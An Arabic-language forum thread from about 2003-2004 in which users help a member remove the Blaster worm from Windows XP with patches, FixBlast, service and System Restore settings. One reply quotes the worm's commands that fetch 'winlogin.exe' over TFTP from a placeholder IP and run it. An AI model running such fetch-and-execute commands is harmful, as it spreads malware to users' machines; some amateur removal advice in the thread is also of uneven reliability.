صفحة 1 من 2 1 2 الأخيرةالأخيرة
النتائج 1 إلى 15 من 16

الموضوع: عجزت عن إزالة فايروس بلاستر win32 !!

  1. #1
    المشرف العام الصورة الرمزية Ibrahim.Hamdy
    تاريخ التسجيل
    Oct 2002
    المشاركات
    5,065
    الدولة: United Arab Emirates
    معدل تقييم المستوى
    67

    عجزت عن إزالة فايروس بلاستر win32 !!



    السلام عليكم ورحمة الله وبركاته
    إنني حقا عجزت عن إزالة هذا الفايروس وبعد أن أجريت كل المحاولات من:
    - تنزيل باتش مايكروسوفت
    - تحديث برامج الفايروسات Pc-Cillin 2003 و NortonAntiVirus2003 و Mcafee 8.0
    - عمل Scan Online من موقع Pc-Cillin ...( www.antivirus.com/free_tools )
    - تحميل ملف سيمانتيك FixBlast.exe
    - إعادة تنزيل Win XP Pro من جديد
    ولم تنفع محاوله من هذه المحاولات ....
    دعوني أشرح لكم الأمر بوضوح حول مشكلتي مع هذا الفايروس
    في بداية الأمر وعند إتصالي بالشبكه وتصفحي للمواقع تظهر لي هذه الرساله :



    إذا ضغطت على Dont Send تظهر لي شاشة الفايروس المعروفه لدى كثير من الناس هذه :



    وإذا لم أضغط على أي شء تظهر لي أيضا بعد حوالي 10 دقائق
    قمت بمحاوله وهي عندما يتظهر لي نافذة الفيروس والعد التنازلي أقوم يفتح Windows task manager (ctrl+alt+del) وأقوم بعمل End Task فلم يقبل فقمت بالضغط عليه بازر الأيسر واخترت Go to Process فيذهب بي إلى ملف اسمه winlogon.exe وعندما احاول عمل end process لها تظهر هذه الرساله :



    فقمت بمحاوله أخرى وهي إيقاف هذه الشاشة ولكن افتره مؤقته عن طريق فتح نافذة Run وكتابة الأمر CMD وعندما تظهر لي نافذة الفيروسات أكتب هذا الأمر shutdown/a( وهي بمعني إلغاء عملية إعادة التشغيل ) فيتوقف فعلاً عمل الفايروس ولكن للأسف يتوقف معها معظم أوامر الكمبيوتر من عدم اكانيتي لعمل save أو copy أو delete أو تصفح الإنترنت أو فتح new window ... وغيره

    فأرجوكم أن تجدوا لي حل في هذه المشكله والتي سببت لي الكثير من المشاكل
    أترككمن في رعاية الله وأمنه بانتظار لآارائكم حول هذا الموضوع

  2. #2
    المشرف العام الصورة الرمزية Ibrahim.Hamdy
    تاريخ التسجيل
    Oct 2002
    المشاركات
    5,065
    الدولة: United Arab Emirates
    معدل تقييم المستوى
    67
    ملحوظه : عندما أقوم برقع مستوى الحمايه في Pc-Cillin Firewall إلى high لا تظهر شاشة الفيروس

  3. #3
    عضو
    تاريخ التسجيل
    May 2003
    المشاركات
    102
    معدل تقييم المستوى
    0

    اخوي IBM

    اول شي كيف حالك وعساك بخير
    ثانيا لا يضيق صدرك ولا شي
    مشكلتك ان شاء الله سهله
    اتوقع انك سبق وركبت الوندز في بارتشن غير السي يعني ركبته في الدي والا الاي ان كان عندك
    وانت سويت فورمات للسي ولكن الفايروس باقي في احد ه>ي البارتشنات لانها سبق وصارت معي نفس المشكله
    يعني احسن شي تسويه ومضمون بادن الله هو انك تسوي اف دسك طير البارتشنات كلها وبعد ما تحمل النظام اول شي تسويه ركبت ملف الباتش اللي نزلوه ميكروسفت الخاص بالفيروس هدا وا ن شاء تنتحل المشكله
    ولا تنسى توافينا با خر الاخبار
    والله يوفقك
    وقل ربي زدني علما

  4. #4
    المشرف العام الصورة الرمزية Ibrahim.Hamdy
    تاريخ التسجيل
    Oct 2002
    المشاركات
    5,065
    الدولة: United Arab Emirates
    معدل تقييم المستوى
    67
    السلام عليكم ورحمة الله وبركاته
    أخي " محب الهاردوير"
    شكرا على ردك ولكن بالنسبه للويندوز فموجود على درايف سي
    وقبل أما أنزل ويندوز قمت بعمل فورمات للدرايف وقمت بإعادة تقسيم للهارد مره أخرى
    !!!!!!!!!!!!!!ماذا أفعل!!!!!!!!!!

  5. #5
    عضو
    تاريخ التسجيل
    Feb 2003
    المشاركات
    177
    معدل تقييم المستوى
    0
    السلام عليكم اخي العزيز


    اخي مشكلة الملف ال winlogin.exe


    و يستخدم نفس ال rpc


    و هو فايرس يستخدم البورت 4444 و يقوم بعمل run للأوامر التاليه

    C:\WINNT\system32>tftp -i x.x.x.x GET winlogin.exe
    C:\WINNT\system32>start winlogin.exe
    C:\WINNT\system32>winlogin.exe


    و ال x هي رقم الايبي الخاص بالفايرس الغبي

    و لتلغيه اخي انا انصحك تعمل اول شي نقطة اعاده افضل شيء و بعدين توكل على الله و جرب و ان شاء الله تروح ولو ما راح و خرب فرمت الجهاز لووول

    سمي بالله اخي و جرب

    تفتح start--> run و تكتب


    cd %windir%\system32
    echo 'go away' > winlogin.exe


    و هذا رح يخرب الملف و ما راح يشتغل مره تانيه

    و بعدين اعمل ريستارت للجهاز و اكتب

    regedit

    و الغي

    HKLM\Software\Microsoft\Windows\CurrentVersion\Run associated with
    winlogin.exe

    و كمان الغي

    %windir\system32\winlogin.exe and %windir\system32\yuetyutr.dll


    و جرب اخي و ان شاء الله تنحل المشكله معاك و لو ما انحلت و خرب الجهاز الله بعينك اعمل فورمات و ارجع ثبت الويندوز بس على الله تنحل انا قرأت الحل بموقع اجنبي يوم من الايام لو لقيت الموقع احطه لك ان شاء الله

    ~ :: Programming ForEveR :: ~


    Projects Accomplished

    E-Commerce site – PHP, PhotoShop, FrontPage and MySQL
    Mini Market Software - Visual Basic and Access
    University WAP site – WML and PHP
    M-commerce site – WML and PHP
    University Registration System – System analysis

  6. #6
    عضو
    تاريخ التسجيل
    Feb 2003
    المشاركات
    177
    معدل تقييم المستوى
    0
    سبحان الله اخي تفضل هذا هو الموقع موفق اخي و الله اول ما كتبت بالبحث winlogin.exe

    كاان اول موقع

    تفضل و موفق ان شاء الله


    http://www.dshield.org/pipermail/lis...ust/009774.php

    ~ :: Programming ForEveR :: ~


    Projects Accomplished

    E-Commerce site – PHP, PhotoShop, FrontPage and MySQL
    Mini Market Software - Visual Basic and Access
    University WAP site – WML and PHP
    M-commerce site – WML and PHP
    University Registration System – System analysis

  7. #7
    إداري سابق
    تاريخ التسجيل
    Jun 2002
    المشاركات
    18,891
    معدل تقييم المستوى
    110
    اعتقد
    اعتقد
    اعتقد

    أن القايروس لديه في ملف ما على مجلد restore لذلك ينبغي عليه أن يلغي خدمة استعادة النظام restore حتى يتسنى له التخلص من القايروس تماما

  8. #8
    عضو
    تاريخ التسجيل
    Oct 2003
    المشاركات
    55
    معدل تقييم المستوى
    0
    السلام عليكم و رحمة الله و بركاته

    اخي الكريم باذن الله حل هذا الفايروس ستجده عندي
    للتخلص من هذا الفايروس الى الابد ما عليك الا ان تتبع الخطوات التاليه :

    الذهاب الى computer management اذهب الى ايقونة جهاز الكمبيوتر الموجوده على سطح المكتب و اضغط بواسطة الفأره كليك يمين و من ثم اختيار الامر manage و بذلك سيذهب تلقائيا الى ال computer management و من ثم اختبار الامر services and applications و من ثم اختيار الامر services الان قم بالضغط على هذا الامر و سيفتح لك على جهة اليمين عدة اوامر قم باختيار الامر remote procedure call (rpc الان قم بالضغط على الامر مرتين و ستفتح لك نافذه قم باختيار الامر recovery و امامك مباشره يوجد عدة خيارات طبعا موجوده عندك على الجهاز restart the computer قم بالضغط على السهم و اختر الامر take no action و بذلك تبطل عمل الفايروس اللعين بلاستر و اذا لم تنحل المشكله ارجع لنفس الخطوات و اعمل الخيار الثاني و الثالث نفس الخيار الاول و ان شاء الله ستنحل المشكله

    اذا كان هنالك اي خطأ في كلامي ارجو من اهل الخبره تصحيح الخطأ ان وجد و الله في عون العبد اذا كان العبد في عون اخيه .... شكرا ...
    فلسطين ... شلت يميني ان نسيتك يا بلادي

  9. #9
    عضو
    تاريخ التسجيل
    Mar 2003
    المشاركات
    493
    معدل تقييم المستوى
    0
    كثر انتشار دودة W32.Blaster.Worm في بعض اجهزة الاخوة هنا في عرب هاردوير و في غيرها.
    يواجه البعض إنغلاق الجهاز ويظهر للبعض هذه الرسالة التحذيرية ثم يغلق الجهاز.



    اولا: يجب ان نجعل الجهاز غير قابل للانغلاق بستخدام احدى هذه الطريقتين.

    1- من Run اكتب التالي shutdown -a
    ثم اضغط ok

    2- استخدم هذه الطريقة إن لم تستطع حسب رقم 1
    من Run اكتب التالي SERVICES.MSC /S
    ثم اضغط ok

    في الخطوة رقم 2 سيظهر الشكل التالي:


    قم بتنفيذ شرحي على الصورة بشكل دقيق، واقرا مرة واثنين وثلاثة قبل الشروع في العمل.

    بعد اختيار خصائص ستظهر النافذه التاليه:

    قم بعمل مثل الشرح على الصورة

    ملاحظة هامه: يجب إعادة ماقمنا به الان بعد إزالة الدودة الى وضعه الاساسي.
    الان الجهاز غير قابل للانغلاق.
    ------------------------------------------------------------
    الخطوة التالية:
    1 - حمل هذا الملف الخاص بوندوز XP فقط من ميكروسوفت وقم بتثبيته اضغط هنا

    اختر لغة الوندوز كما في الصورة


    بعد تثبيت الملف 823980 قم باعادة تشغيل جهازك ( يعني اغلقه ثم شغله).

    2- حمل برنامج FixBlast من سيمانتك لأزالة الدودة.
    حمل الملف التالي واحفظة في مكان معروف ( سطح المكتب مثلا)
    اضغط هنا
    ==============
    الان قم بتوقيف استعادة النظام ( System Restore)
    بالماوس الايمن اضغط على my computer ثم اختر خصائص ( properties )
    ستظهر النافذة التالية: نفذ العملية كما هو الشرح على الصورة.

    اضغط ok

    الان قم بتوقيف الفايرس اللعين عن العمل عبر الخطوات التالي:
    CTRL+ALT+DELETE
    ستظهر الصورة التالية:

    ابحث عن ملف الدودة msblast.exe و اضغط عليه حتى يصبح لونه ازرق ثم اضغط End process
    ملاحظة: لن تجد الملف إن كنت غير متصل بالانترنت.
    ---------------------------------------------------------------------

    الان اصبح كل شي جاهز لعملية الازالة.
    اذهب الى الملف الذي حملناه ووضعناه على سطح المكتب تحت اسم FixBlast ثم اضغط عليه ودع البرنامج يبحث عن الدودة ويقوم بأزالتها.

    إن ظهرت لك رسالة تقول أن البرنامج لم يستطع ازالة الدودة اعد اشغال جهازك على الوضع الامن Safe mode (الطريقة موجودة في الرد الثاني) ثم قم بتشغيل برنامج FixBlast وجهازك على الوضع الامن.

    سوف يظهر في النهاية عندك مثل الشكل التالي:


    وهذا يعني ان الدودة انتهت.
    كرر عملية تشغيل برنامج الازالة مرة ثانية وثالثة حتى تتأكد من ان الدودة اعدمة.

    اخيرا: قم بسترداد وضع جهازك السابق مثل إعادة وضع تشغيل النظام الى سابق عهده كذلك إعادة ما قمنا به في البداية الى سابق عهده.

    وبالتوفيق للجميع.

    م....ن....ق....و....ل

  10. #10
    المشرف العام الصورة الرمزية Ibrahim.Hamdy
    تاريخ التسجيل
    Oct 2002
    المشاركات
    5,065
    الدولة: United Arab Emirates
    معدل تقييم المستوى
    67
    عندما قمت بتحميل ويندوز مره أخرى
    لا أستطبع تتنزيل الباتش على الحاسب وتظهر لي هذه الرساله


    هل من الممكن أن تكون المشكله أن نسخة الزيندوز الموجوده لدي غير مرخصه
    http://www.arabhardware.net/showthre...&threadid=8735

  11. #11
    عضو
    تاريخ التسجيل
    Oct 2003
    المشاركات
    55
    معدل تقييم المستوى
    0
    السلام عليكم
    اخي العملاق Al-Mazrouei

    بالفعل شرح كافي وافي و صح لسانك على هالشرح المفصل و الشيق
    اخي الكريم انت كاتب اخر المقال منقول ممكن نعرف من اي موقع
    و شكرا .....
    فلسطين ... شلت يميني ان نسيتك يا بلادي

  12. #12
    عضو
    تاريخ التسجيل
    Sep 2003
    المشاركات
    220
    معدل تقييم المستوى
    0
    قمت باعادة تهيئة القرص و لت تستطع ازالة الفيروس ؟؟؟ ههه ما يصير لكن اذا تبين هذا الشي في النهاية ارجو تفصيل الموضوع بعد التاكد .

    انا اتوقع ان نسخة الويندوز التي لديك معطبة .. و مثل ما ذكرت هذا الامر لا يعني وجود الفيروس .. عند حدوث مشكلة في RPC يغلق النظام نفسه .
    بالله عليكم , في Cracker نزيه و مؤدب يعطي المستخدم وقت لحفظ اعماله ؟

  13. #13
    عضو
    تاريخ التسجيل
    Jan 2004
    المشاركات
    297
    معدل تقييم المستوى
    0
    شغل جدار الحمايه الموجود في ال xp .....اعد التشغيل .....بعد التفعيل سينقطع حبل حياة الفيروس ....نزل patch من ميكروسوفت .....run النورتون....وهذا سيكون اخر عهدك بالفيروس.
    DaDuck

  14. #14
    عضو
    تاريخ التسجيل
    Feb 2004
    المشاركات
    2
    معدل تقييم المستوى
    0

    مساعدة

    حل لمشكلتك لدي
    عليهم

  15. #15
    عضو
    تاريخ التسجيل
    Feb 2004
    المشاركات
    2
    معدل تقييم المستوى
    0

    تحتاج لمساعدتي لو لا



    اذا كنت تريد ان اساعدك في هذة المشكلة فرد لي
    كل هذا الكلام الذي قالوة الاصدقاء فهوة تخريف والحل سهل جدا لدي يا صديقي
    عليهم

صفحة 1 من 2 1 2 الأخيرةالأخيرة

المواضيع المتشابهه

  1. مشاركات: 9
    آخر مشاركة: 02-11-2010, 18:23
  2. اظنه فيلاروس بلاستر
    بواسطة aboyzed في المنتدى الأرشيف
    مشاركات: 25
    آخر مشاركة: 18-01-2004, 23:07
  3. فيروس بلاستر
    بواسطة hitman في المنتدى الأرشيف
    مشاركات: 5
    آخر مشاركة: 24-11-2003, 23:52
  4. win32
    بواسطة بوشهاب في المنتدى الأرشيف
    مشاركات: 6
    آخر مشاركة: 19-06-2003, 19:09
  5. ساوند بلاستر اودجي بسعر معقول
    بواسطة أنور في المنتدى الأرشيف
    مشاركات: 3
    آخر مشاركة: 01-08-2002, 22:29

الكلمات الدلالية لهذا الموضوع

المفضلات

ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •